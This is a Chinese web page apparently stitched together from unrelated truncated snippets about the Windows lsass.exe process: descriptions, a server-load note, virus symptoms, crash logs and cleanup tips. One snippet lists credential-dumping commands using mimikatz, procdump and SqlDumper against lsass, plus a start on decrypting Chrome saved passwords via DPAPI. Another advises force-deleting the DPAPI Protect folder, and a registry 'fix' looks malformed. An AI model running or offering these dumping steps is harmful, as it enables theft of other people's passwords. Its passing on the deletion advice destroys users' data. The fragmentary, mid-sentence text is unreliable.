lsass

Windows进程解析 进程是程序在计算机上的一次执行活动。运行一个程序时，就启动了一个进程。相对而言，程序是一组代码，是静态的，进程是代码的执行行为，是活的。 在Windows下，进程又被细化为线程，也就是一个进程下有多个能独立运行的更小的单位。 windows重要系统进程详解 Winlogon 是一个登录/退出进程。winlogon在用户按下CTRL+ALT+DEL时激活，并显示安全对话框。该进程提供了登录所需的类型控制和输入口令所需的对话框。当你输入用户名和口令时，Winlogon将其发送给一个叫做LSASS的子进程。如果你执行对服务器或工作站的本地登录，LSASS进程将在安全数据库（亦即SAM）中查对有关用户名和口令。Winlogon有两个子进程，即服务控制器和LSASS。 Explorer进程 在Windows系列的操作系统中，运行时都会启动一个名为Explorer.exe的进程。这个进程主要负责显示系统桌面上的图标以及任务栏。 csrss.exe进程 这个进程是用户模式Win32子系统的一部分，CSRSS代表客户/服务器运行子系统而且是一个基本的子系统必须一直运行。CSRSS负责控制Windows图形相关子系统，创建或者删除线程和一些16位的虚拟MS-DOS环境。 System Idle 这个进程不可以从任务管理器中关掉，是作为单线程运行在每个处理器上

前言：两种方式都可以实现，一种利用mimikatz dpapi，还有一种利用ChromePass工具，各有各的优点吧 第一种：利用mimikatz dpapi获取Master Key进行解密 首先要了解的概念： DPAPI： 全称Data Protection Application Programming Interface DPAPI blob： 一段密文，可使用Master Key对其解密 Master Key： 64字节，用于解密DPAPI blob，使用用户登录密码、SID和16字节随机数加密后保存在Master Key file中 Master Key file： 二进制文件，可使用用户登录密码对其解密，获得Master Key 实现方法： 1、使用python读取数据库文件Login Data并提取出密文 from os import getenv import sqlite3 import binascii conn = sqlite3.connect("Login Data") cursor = conn.cursor() cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): print

1.mimikatz mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswords full" >>1.txt exit 2.procdump 1、在目前机器上执行 procdump.exe -accepteula -ma lsass.exe lsass.dmp 2、把lsass.dmp下载到本地，放在同样的系统（目标是windows2008-->本地也用Windows2008） 3、mimikatz加载lsass.dmp sekurlsa::minidump lsass.dmp 4、抓取密码 sekurlsa::logonPasswords full 3.SqlDumper.exe 1、如果目标系统上安装了windows sql server ，SqlDumper.exe默认存放在c:\Program Files\Microsoft SQL Server\number\Shared，其中number代表sql server的版本 140 for SQL Server 2017 130 for SQL Server 2016 120 for SQL Server 2014 110 for SQL Server 2012 100 for SQL Server 2008 90 for SQL Server 2005

问题描述： 当 ArcGISServer .NET 应用程序和 IIS 服务访问量过大时（每秒超过 25 个并发请求）， LocalSecurity Authority Subsystem Service (lsass.exe) 系统进程就会变得负担过重 . 这个能造成系统性能下降，在极端的情况下，在如此大的负载情况下系统运行超过 12 个小时，服务器会死机。 原因： ArcGISServer .NET Web 应用程序和服务必须运行在 AGSUSERS 或 AGSADMIN 工作组下。通常的情况下，创建应用程序或者服务是通过 ArcGIS Server 的 Web 应用程序或者 Catalog 完成，它们是被当作一个 aspnet 进程处理的。 ArcGISServer 组件处理 Internet 服务请求，例如： http://myArcGISServer/arcgis/services 或者 http://myArcGISServer/arcgis/rest ，或者自己的 Web 服务，使用过 ArcGIS Web Services 账户运行的。 每当一个 Web 应用程序或者 Web 服务处理一个请求的时候，在 ASP.NET 工作进程下必须通过 lsass.exe 去认证。在正常负责条件下，这些认证操作是没有问题的。但是当访问量过大的时候

lsass.exe是一个系统进程，用于 微软 Windows系统的安全机制。它用于本地安全和登陆策略。注意：lsass.exe也有可能是Windang.worm、irc.ratsou.b、Webus.B、MyDoom.L、Randex.AR、Nimos.worm创建的，病毒通过 软盘 、群发邮件和P2P文件共享进行传播。 进程文件： lsass or lsass.exe 进程名称： Local Security Authority Service 进程类别：其他进程 英文描述： lsass.exe is a system process of the Microsoft Windows security mechanisms. It specifically deals with local security and login policies. Note: lsass.exe also relates to the Windang.worm, irc.ratsou.b, Webus.B, MyDoom.L, Randex.AR, Nimos.worm which 中文参考： 对不起，暂时没有中文参考！ 出品者：Microsoft Corp. 属于：Microsoft Windows Operating System 系统进程：Yes 后台程序：Yes 网络 相关：Yes

病毒症状 进程里面有2个lsass.exe进程,一个是system的,一个是当前用户名的(该进程为病毒).双击本地磁盘D:打不开,只能通过右击选择打开来打开.用瑞星扫描可以扫描出来,并且可以杀掉.但是重启后又有两个lsass.exe进程.该病毒是一个木马程序,中毒后会在D盘根目录下产生command.com和autorun.inf两个文件，同时侵入注册表破坏系统文件关联.该病毒修改注册表启动RUN键值,指向LSASS.exe，修改HKEY_CLASSES_ROOT下的.exe，exefile键值，并新建windowfile键值.将exe文件打开链接关联到其生成的病毒程序%SYSTEM/EXERT.exe上. 该病毒新建如下文件： c:/program files/common files/INTEXPLORE.pif c:/program files/internet explorer/INTEXPLORE.com %SYSTEM/debug/debugprogram.exe %SYSTEM/system32/Anskya0.exe %SYSTEM/system32/dxdiag.com %SYSTEM/system32/MSCONFIG.com %SYSTEM/system32/regedit.com %SYSTEM/system32/LSASS.exe %SYSTEM

关于windows上的lsass.exe进程 作者:eygle 出处: http://blog.eygle.com 日期:December 26, 2004 « 安装cronolog,格式化Apache的日志文件 | Blog首页 | 配置AWStats，Apache日志分析工具 » 今天见到有人问lsass.exe进程，翻了点东西，记录些东西在这里。 lsass - lsass.exe - 进程信息 进程文件: lsass or lsass.exe 进程名称: 本地安全权限服务 描述: 本地安全权限服务，控制Windows安全机制。 常见错误: N/A 是否为系统进程: 是 该进程为系统进程，不能在任务管理器里终止，记得以前在命令行kill该进程，可能会导致系统蓝屏（不确认了）。 微软的说明如下: Lsass.exe - You cannot end this process from Task Manager. This is the local security authentication server, and it generates the process responsible for authenticating users for the Winlogon service. This process is performed by using

一、打开浏览器出现lsass.exe进程占用一个cpu核心100%。 二、 lsass.exe进程 是微软为Windows?操作系统定义的系统进程，存在于基于Windows NT的系统，如Windows 2000/Xp/2003/Vista系统中。其描述为：LSA Shell （Export Version）本地安全认证服务，其作用是处理密码变更以及验证尝试登录到计算机的用户，如果登录成功它会创建该用户的访问令牌，并用它来启动外壳程序（ Explorer.exe ），其他的由用户初始化的进程会继承这个令牌。 三、将lsass.exe进程其强行终止，系统会60秒内 自动重启。 不过这个我们可以在运行中输入： shutdown -a 来去掉这个lsass.exe自动重启。 四、 最终解决办法如下： RD /s /q "%USERPROFILE%\AppData\Roaming\Microsoft\Protect" 来源： CSDN 作者： liangston 链接： https://blog.csdn.net/liangston/article/details/78850107

关键系统进程 C:\Windows\system32\lsass.exe 失败，状态代码是 255。现在必须重新启动计算机。 错误应用程序名称: lsass.exe，版本: 6.1.7600.16385，时间戳: 0x4a5bc155 错误模块名称: unknown，版本: 0.0.0.0，时间戳: 0x00000000 异常代码: 0xc0000005 错误偏移量: 0x0000000070e85369 错误进程 ID: 0x238 错误应用程序启动时间: 0x01d55f18bf31cf00 错误应用程序路径: C:\Windows\system32\lsass.exe 错误模块路径: unknown 报告 ID: 38e0047d-cbb3-11e9-972e-d05099cd6526 服务器安装的server 2008 r2的系统。莫名的重启了一次，查看日志如上。 观察任务管理器中lsass.exe内存在不断增大。 处理方法：安装微软官网上的 Windows 7 的 2017 年 3 月安全每月质量汇总 (KB4012215) 补丁 后，观察内存不会再继续上升。给位如果遇到此问题可以进行参考。 来源： CSDN 作者： plan1990 链接： https://blog.csdn.net/plan1990/article/details/100515363

在进程里可以见到有两个相同的进程，分别是lsass.exet和LSASS.EXE.同时在windows下生成LSASS.EXE和exert.exe两个可执行文件，且在后台运行。LSASS.EXE管理exe类执行文件，exert.exe管理程序退出。用360安全卫士，找出问题进程的路径，手动终止LSASS.EXE和exert.exe两个进程（管理器不能终止LSASS.EXE,提示系统进程不能终止,建议用超级兔子），打开msconfig.exe取消LSASS.EXE启动项。删除C:/Documents and Settings/Administrator/Local Settings/tempt和Temporary Internet Files下的文件,断开网络后再删除C:/Program Files/Common Files/update文件夹，这里exe类文件已不能运行，新建一个reg(注册表)文件，输入如下内容： Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE/SOFTWARE/Classes/.exe] @="exefile" "Content Type"="％1，%*" [HKEY_LOCAL_MACHINE/SOFTWARE/Classes/.exe/PersistentHandler] @="